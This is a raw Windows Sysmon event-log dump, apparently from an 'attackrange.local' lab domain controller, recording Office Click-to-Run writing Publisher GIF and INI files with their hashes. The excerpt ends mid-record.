14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR11F.GIFMD5=482884CDEBB7A2B0CFCA4A38DA8480AB,SHA256=EED2ABF4AEAD08F16F84DB73FA4DF6BBEA073E2B517DFA93D70C6217687FE483,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR10F.GIFMD5=24F298D944F8BBD6D6BDC8A633D72A3B,SHA256=E58D7E004465B6BB038EFED208CBD11B17D553E91249F8948ECDAA129AF99302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPDIR00.GIFMD5=73401A1D8E46B3BEBB8B73A69CC344C9,SHA256=E6C6C60DB896C52E0E0F2074D071922086C7E8454846FEF270844C5A44694BD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\ZPAPERS.INIMD5=EAE79C239C8EFF472306E460F881C5A8,SHA256=60AA37E5A6753229E16E7B38051C0EDB309C574086566A969CF09FDA8D65A0A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR9F.GIFMD5=415D5A8662A712A0CB2A0101D8A285CD,SHA256=2DBC13710DF0CF635703B97B26D0089D324E8A924B3CAF0D01DC87796F745748,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR9B.GIFMD5=E3E480B7C54BE2F7883914CEDABFD500,SHA256=B4F72D0B8E71A2330FF5F2687AAB433941935201C71B5C6B94D354DB1FA6505D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR8F.GIFMD5=3E9392145E73105FFB429A9818FAB88E,SHA256=1976B3B7F7ED44E27391A81DE29DDA7C782DAE6083613478C0E75866C800BB17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR8B.GIFMD5=C340FD768C103DBAB3D2D0E744CB4C4F,SHA256=3928F8E564ED8DF9488092954FD05CC5A899198FE569590819538C2106B03B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR7F.GIFMD5=1F12F0841B671234DE94D0FA50C11C70,SHA256=025CBFA874D6440FD2B9CA79FCD20E6CE8174F3F40C041EF4710AD8A8A6CF310,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR7B.GIFMD5=05327C66F9FEF2D675F7C568C3D8F0C8,SHA256=96A0D1A16CC759FB00075A1106D6B4FEF7AABEA3AE7E82F609E1E9534031B46D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR6F.GIFMD5=F432921872D5A247D57C0ACE59F7291F,SHA256=66868DE38308CD2C757F55CD181C4559834D8E04BDC2F1F0143FB8258F31D899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR6B.GIFMD5=023C8A03AD51B53A3DF0C9A6023B8AEA,SHA256=675968C42D48557969E205E643213E2E8F98BA5D58C906E99A9182FB5C3050C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR5F.GIFMD5=8689DBEB36524AB87AA71BD777D0E5AB,SHA256=77A2AEDCDBAD462799775AF2DA72F82E44B2C730B67F9D4727C966A380593FA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR5B.GIFMD5=40BC8E63F05C0C0F6C48EA2D172A9D61,SHA256=0BDCCE8F826E1B560E942BCFB6D7B0ADCF0D9F4FA492DB8178AC3D77E6383308,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR51F.GIFMD5=244EE9FAA8565D4CEDE01BABB295FD9F,SHA256=7F7E15BF51E0C654735E7A6B30F965B486F694B7306A58101DB5CC966F00C226,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR51B.GIFMD5=9FFCF3FFE27BCED0A4380CC6F8D49089,SHA256=E770CE46264FB29D9B71706D4918A43F35A0E55A9C1693B90B54BA9879D11329,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR50F.GIFMD5=FAE1B07DB885F523D5A418A3F613A383,SHA256=5FB38EB63E7B93F9353EEDBC1463744F43B343B8E29F9189CFF8C7364BEAEAA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR50B.GIFMD5=733053BC5F12410C226BAF3EE28AB5B1,SHA256=38F5127717E3FCC9AE0E49BF4DAA42B488B61A2C2875D75D327978441B09410E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR4F.GIFMD5=51A71D534C3AC39A17F07BE56EA69086,SHA256=6719ED2102689B794C2232131F82C5DEB3217CBAF554FABF81EEF5D62044471B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR4B.GIFMD5=4BB0CBB2368ACE977CD41891231E0364,SHA256=3094B8A73525E5A3D8351121F8BC5EA408F0EFAC969D405C3CB6FBA093E9CDB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR49F.GIFMD5=E7E6F3FB247C79AFA84F87C75E9EB4AA,SHA256=349FEBC90524DC509DD8685FAEBEAD72F9649A824993D15294E02DE2FB2AC6AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR49B.GIFMD5=62BB601A761B886E6D7AB2AE627A2D49,SHA256=87F05756783E5A5C502F57C3D18B8E6B866676CFEB422431ACC5DC30F408B18B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR48F.GIFMD5=9D22C03CB3777528211B868545341518,SHA256=61BDCDB1C8784E49C1FCDEC3317102CE7CA8461A74B2A1732C446D73407421D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR48B.GIFMD5=E6C5FAB2FEB8E9D28ED3DE49A3606174,SHA256=02505CF221187F138975DEE21C124CE1AF14C9CE6D1CA0E3237D8B5AF501F1F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR47F.GIFMD5=0553E5A7B44C848E2BA4C745920AC7B5,SHA256=07B1691A458CE260B2D1D1746EFB54D414C5FD131FCAB4ED89763D887ABBAD4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR47B.GIFMD5=EAFAAD5916E790109CDCEC75F15AD1ED,SHA256=C9AAC5EC3E7F4E4BBB9DD39BB3E37F5C0A18F619EDAC595286FFC2B7B90C28D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR46F.GIFMD5=FF2C7DE9C7C8AE4CC1B432AB1A6E7099,SHA256=C624FD8CA3A12C8D309A4D211AD841997100F3E1E756BC834D027283996BB330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR46B.GIFMD5=2E3A4B8FB7C1BFEC6F2690257CD0CF79,SHA256=FEB03C2F6260ABD081E25FFA2823B62CC7F87095CD97BEA61F65A57D24445FCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR45F.GIFMD5=A18CB8E664394DFB0C8182E6A2967205,SHA256=3923FD88764EAF6D56A888C0AD1CF25BA3270CF8914B957AD3830CEBD6B5AD35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR45B.GIFMD5=010886E985C3885F38C21FFEFEAF8956,SHA256=120DACE675764DAF23B9D0BFF37A1A22691465CACFE51062CA21CDE188FCEFCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR44F.GIFMD5=8BDD5422CA1B2170566FAE8FB8F7F765,SHA256=4D82A05DC2C563E286500BB10EFD29DC45224DDBE94CAB7C3F6033811EC853C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR44B.GIFMD5=1B884B095F052C0DCEF1B0F3E3EAD191,SHA256=F3FCC6036EE6C83A09DB5DE433FB162A3FB93F64DA7BF14E1C51C57409661A74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR43F.GIFMD5=B5E6D93669E4198D89B6AC9F4558D3B5,SHA256=3DE0798B2F83086200837CC61CADCAFCCD426D87CC2FF35757BC2C4D6DB30A01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR43B.GIFMD5=FF2BDFEA8E884F30334462D39A170A9A,SHA256=18B10C147187052670FAC849432C3BEE159538A7370435F44CEF123AE4483206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR42F.GIFMD5=9B1B7D351304DB1A947F9878C1A265E4,SHA256=86BAC590479FC6926464181CC1AA4A7BB0218C4B7530249CD7FEF4FAA8048039,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR41F.GIFMD5=30D437F7EAFAA2824CE40252374AB84D,SHA256=0F8CEF90356B2B675CE2069E18AC9A24DCB59FE4B7DE68D973AC87741EB37B4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR40F.GIFMD5=B4941512BC30B453C29AA7E9435CE12E,SHA256=6B033912B2ABC66FB52B7B448F91D2794226F8BBA824AB38C7BD3104734E6EF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR3F.GIFMD5=BC506A880994456F33158460D46E388F,SHA256=492D6F758225FB7ABD86CEABDB9E34BD556A7BF5A87A749E197D0D07661CCEF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR3B.GIFMD5=759110FDBED89F718BDB57FCB45919B8,SHA256=C54D5625097EA04E323D655F2F7945EE7AB02FA7D68CF7F24B7360118660A805,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR39F.GIFMD5=6EB45B67B56EFA231531809BB4A3BEB4,SHA256=97BCBD958B3A5B77AF42F9E7DE4C12FF918F9BC32218AD50ED18512B0121F521,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR38F.GIFMD5=2C0B526BBD9680C73150904CC2C5769A,SHA256=D1A4869C37CF40AEB5847185188774BF9A9907790B3FD3735BA96FCD8353C0BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.830{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE523418BE1881F6651E69C785A42F16,SHA256=E7AD00702DD45848298675D721D1CEFB284D993F7151AB61013A0043F51F6E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR37F.GIFMD5=ABA270FE6861B2B34679228CC1E8C251,SHA256=730C2F6181DC37312C6DFD52D3101EBC772D33A2A4589399D6EAE87176EC07D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBSPAPR\PDIR36F.GIFMD5=4FB3DFDD4E23B54648DB5BC6317DB497,SHA256=BA229A9EB702084C1EE642AAF8C44CB14B94D3D80FD3DC62F350EE89938DE1B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 